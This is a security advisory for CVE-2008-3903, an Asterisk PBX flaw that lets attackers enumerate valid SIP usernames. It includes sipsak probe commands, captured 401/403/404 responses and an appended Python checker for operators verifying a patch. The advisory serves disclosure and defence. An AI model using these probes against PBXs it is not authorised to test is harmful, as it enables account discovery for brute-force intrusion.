Asterisk Authentication SIP Response Username Enumeration Vulnerability

2009-04-04T00:00:00
ID SSV:4993
Type seebug
Reporter Root
Modified 2009-04-04T00:00:00

Description

BUGTRAQ ID: 34353 CVE(CAN) ID: CVE-2008-3903

Asterisk is an open-source software PBX that supports a wide range of VoIP protocols and devices.

When Digest authentication is enabled, Asterisk PBX returns different responses for valid and invalid SIP usernames tried during login, so a remote attacker can enumerate valid usernames by brute-force guessing.

Affected versions
Asterisk Asterisk 1.6.0.x
Asterisk Asterisk 1.4.x
Asterisk Asterisk 1.2.x
Asterisk Business Edition C.2.x.x
Asterisk Business Edition C.1.x.x
Asterisk Business Edition B.x.x
Asterisk s800i 1.3.x


The vendor has released patches that fix this security issue; download them from the vendor's site:

http://downloads.digium.com/pub/asa/AST-2009-003-1.2.diff.txt
http://downloads.digium.com/pub/asa/AST-2009-003-1.4.diff.txt
http://downloads.digium.com/pub/asa/AST-2009-003-1.6.0.diff.txt
http://downloads.digium.com/pub/asa/AST-2009-003-1.6.1.diff.txt

On Asterisk 1.4 with alwaysauthreject enabled:

Invalid user with an invalid password

% sipsak-0.9.6/sipsak -IU -a testx -s sip:testX@asteriskbox:5060

SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 192.168.1.199:63013;branch=z9hG4bK.5db5cc72;alias;received=192.168.1.199;rport=48834
From: sip:testX@192.168.8.234:5060;tag=550fcb06
To: sip:testX@192.168.8.234:5060;tag=as49ef5a0f
Call-ID: 1427098374@192.168.1.199
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="70f69171"
Content-Length: 0

Valid user with an invalid password

% sipsak-0.9.6/sipsak -IU -a test -s sip:test@asteriskbox:5060

SIP/2.0 403 Forbidden (Bad auth)
Via: SIP/2.0/UDP 192.168.111.1:64426;branch=z9hG4bK.53e7c9a7;alias;received=192.168.1.199;rport=40966
From: sip:test@192.168.8.234:5060;tag=4e3b4edd
To: sip:test@192.168.8.234:5060;tag=as305009f4
Call-ID: 1312509661@192.168.111.1
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0

On Asterisk with alwaysauthreject disabled:

Invalid user with an invalid password

% sipsak-0.9.6/sipsak -IU -a testx -s sip:testX@asteriskbox:5060

SIP/2.0 404 Not found
Via: SIP/2.0/UDP 192.168.111.1:62508;branch=z9hG4bK.37dcbfcf;alias;received=192.168.1.199;rport=37469
From: sip:testX@192.168.8.234:5060;tag=5596ae2f
To: sip:testX@192.168.8.234:5060;tag=as5620a72f
Call-ID: 1435938351@192.168.111.1
CSeq: 1 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0

Valid user with an invalid password

% sipsak-0.9.6/sipsak -IU -a testx -s sip:test@asteriskbox:5060

SIP/2.0 403 Forbidden (Bad auth)
Via: SIP/2.0/UDP 192.168.1.199:62607;branch=z9hG4bK.1b938cca;alias;received=192.168.1.199;rport=35572
From: sip:test@192.168.8.234:5060;tag=55aaf11b
To: sip:test@192.168.8.234:5060;tag=as4e3f230d
Call-ID: 1437266203@192.168.1.199
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0
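The captures above show the oracle: the status line and the presence of a WWW-Authenticate challenge differ between an unknown account and a known account with a wrong password. The following is an added example, not part of the advisory or of Asterisk, that a PBX operator can run over two captured REGISTER responses after patching to confirm the responses are no longer distinguishable; the two sample responses are constructed, abridged from the advisory's alwaysauthreject=yes captures.

```python
# Header values that differ between any two transactions (tags, nonce) are
# compared for presence only, never by value.
PER_TRANSACTION = {"Via", "From", "To", "Call-ID", "CSeq", "WWW-Authenticate"}

def parse_sip_response(raw):
    """Split a raw SIP response into (status code, reason phrase, headers)."""
    lines = raw.strip().splitlines()
    _version, code, reason = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header section
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return int(code), reason, headers

def leaked_fields(unknown_user_resp, known_user_resp):
    """Fields that tell the two responses apart; [] means no enumeration oracle."""
    code_a, reason_a, hdr_a = parse_sip_response(unknown_user_resp)
    code_b, reason_b, hdr_b = parse_sip_response(known_user_resp)
    diffs = []
    if code_a != code_b:
        diffs.append("status-code")
    if reason_a != reason_b:
        diffs.append("reason-phrase")
    for name in sorted(set(hdr_a) ^ set(hdr_b)):
        diffs.append("header-present:" + name)  # header on one side only
    for name in sorted((set(hdr_a) & set(hdr_b)) - PER_TRANSACTION):
        if hdr_a[name] != hdr_b[name]:
            diffs.append("header-value:" + name)
    return diffs

# Constructed samples, abridged from the advisory's captures (alwaysauthreject=yes).
UNKNOWN_USER = """SIP/2.0 401 Unauthorized
To: sip:testX@192.168.8.234:5060;tag=as49ef5a0f
Call-ID: 1427098374@192.168.1.199
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="70f69171"
Content-Length: 0
"""
KNOWN_USER = """SIP/2.0 403 Forbidden (Bad auth)
To: sip:test@192.168.8.234:5060;tag=as305009f4
Call-ID: 1312509661@192.168.111.1
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Content-Length: 0
"""

if __name__ == "__main__":
    print(leaked_fields(UNKNOWN_USER, KNOWN_USER))
```

On the unpatched captures this reports the status code, reason phrase and the WWW-Authenticate header; a patched PBX should yield an empty list for the same pair of probes.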